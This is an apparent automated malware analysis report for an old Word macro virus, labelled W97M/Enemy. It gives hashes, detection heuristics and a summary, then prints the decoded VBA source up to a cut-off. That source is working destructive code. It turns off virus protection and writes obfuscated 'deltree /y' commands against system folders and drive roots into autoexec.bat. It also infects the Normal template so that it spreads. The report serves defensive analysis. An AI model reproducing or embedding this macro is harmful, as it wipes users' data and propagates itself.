Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afc3b48d4004bff9…

MALICIOUS

Office (OLE)

Size: 37.5 KB · Created: 2001-02-22 08:12:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: 37857410d4b274afbfc1069ca9df6f54 · SHA-1: f6e8fbeb9a414341753333edc6349145b11fa0a3 · SHA-256: afc3b48d4004bff982f74f0cb62cfa343967b865c98bceed19a5fe0da9ac4a64
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1547.001 Registry Run Keys / Startup Folder · T1027 Obfuscated Files or Information

The sample contains VBA macros that attempt to disable virus protection and execute a batch file (in the extracted source the macro appends commands to C:\autoexec.bat rather than invoking it directly). The macro code is obfuscated with Chr() concatenation, but it appears to be constructing the paths 'C:\windows\system\brsec32.dll' and 'C:\autoexec.bat'. In the extracted source, the batch-file write runs only when the day of the month is 26 and the brsec32.dll marker file is absent; the appended lines are 'deltree /y' commands against 'c:\mydocu~1', 'c:\progra~1', 'c:\windows\system' and the drive roots. The macro also clears the document's summary properties and rewrites the Normal template's code module with a copy of itself, which is the persistence and propagation behaviour to look for on an affected host. The Document_Open macro is designed to run automatically when the document is opened, indicating malicious intent to compromise the system.

Heuristics 3

  • ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 — critical — CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
  • VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro — high — OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39506 bytes
SHA-256: c8df07b6390359e9530c7849258dcaae5f22f778876a9e78d7012c591259e384
Preview script
First 1,000 lines of the extracted script
' Module header as exported by oletools.olevba.extract_macros (see the
' "Extracted artifacts" table above). These Attribute lines are VBE module
' metadata written by the exporter, not executable macro statements.
' NOTE(review): the VBE normally hides Attribute lines from the CodeModule
' view, so they presumably do not count towards the CodeModule.Lines /
' CountOfLines values the macro body inspects — confirm before relying on it.
Attribute VB_Name = "ThisDocument"
' Base class: this is the document's own ThisDocument module, derived from
' the Normal template (matches the NormalTemplate.VBProject access below).
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
' Predeclared / exposed document module: a default instance exists without
' explicit construction — presumably how Document_Open gets bound; verify.
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Enemy
Private Sub Document_Open()
'w97m/Enemy
On Error Resume Next
Options.VirusProtection = 0
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Dim Flag As Boolean
Dim hFile As Long
With Application
.EnableCancelKey = False
.ScreenUpdating = False
.DisplayAlerts = wdAlertsNone
.ShowVisualBasicEditor = False
End With
If Day(Now()) = 26 Then
If UCase(Dir(Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(92) + Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108))) <> UCase(Chr(98) + Chr(114) + Chr(115) + Chr(101) + Chr(99) + Chr(51) + Chr(50) + Chr(46) + Chr(100) + Chr(108) + Chr(108)) Then
If UCase(Left$(Application.UserName, 1)) = "R" Then Flag = 1
BatMod = GetAttr(Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116))
SetAttr strFile, vbNormal
Deltree$ = Chr(100) + Chr(101) + Chr(108) + Chr(116) + Chr(114) + Chr(101) + Chr(101) + Chr(32) + Chr(47) + Chr(121) + Chr(32)
Nul$ = Chr(32) + Chr(62) + Chr(32) + Chr(110) + Chr(117) + Chr(108)
hFile = FreeFile
Open Chr(99) + Chr(58) + Chr(92) + Chr(97) + Chr(117) + Chr(116) + Chr(111) + Chr(101) + Chr(120) + Chr(101) + Chr(99) + Chr(46) + Chr(98) + Chr(97) + Chr(116) For Append Access Write As hFile
Print #hFile, vbCr + vbLf + Chr(64) + Chr(101) + Chr(99) + Chr(104) + Chr(111) + Chr(32) + Chr(111) + Chr(102) + Chr(102)
Print #hFile, Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(32) + Chr(111) + Chr(102) + Chr(102)
If Flag = 1 Then
Print #hFile, Deltree$ + Chr(102) + Chr(58) + Chr(92) + Nul$
Print #hFile, Deltree$ + Chr(101) + Chr(58) + Chr(92) + Nul$
Print #hFile, Deltree$ + Chr(100) + Chr(58) + Chr(92) + Nul$
End If
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(109) + Chr(121) + Chr(100) + Chr(111) + Chr(99) + Chr(117) + Chr(126) + Chr(49) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(112) + Chr(114) + Chr(111) + Chr(103) + Chr(114) + Chr(97) + Chr(126) + Chr(49) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Chr(119) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(115) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Nul$
Print #hFile, Deltree$ + Chr(99) + Chr(58) + Chr(92) + Nul$
Close hFile
SetAttr strFile, BatMod
End If
End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = ""
.Title = ""
.Subject = ""
.Comments = ""
.Keywords = ""
.Execute
End With
NormalAttrib = GetAttr(NormalTemplate.FullName)
If NormalAttrib = vbReadOnly Then GoTo Fuck
If NormalAttrib = vbReadOnly + vbArchive Then GoTo Fuck
Set ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If ad.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then
If ad.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines
ad.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41) & vbCr & nt.Lines(3, nt.CountOfLines - 10))
End If
If nt.Lines(1, 1) <> Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) Then
If nt.CountOfLines > 0 Then ad.DeleteLines 1, ad.CountOfLines
nt.DeleteLines 1, nt.CountOfLines
nt.AddFromString (Chr(39) + Chr(69) + Chr(110) + Chr(101) + Chr(109) + Chr(121) & vbCr & Chr(80) + Chr(114
... (truncated)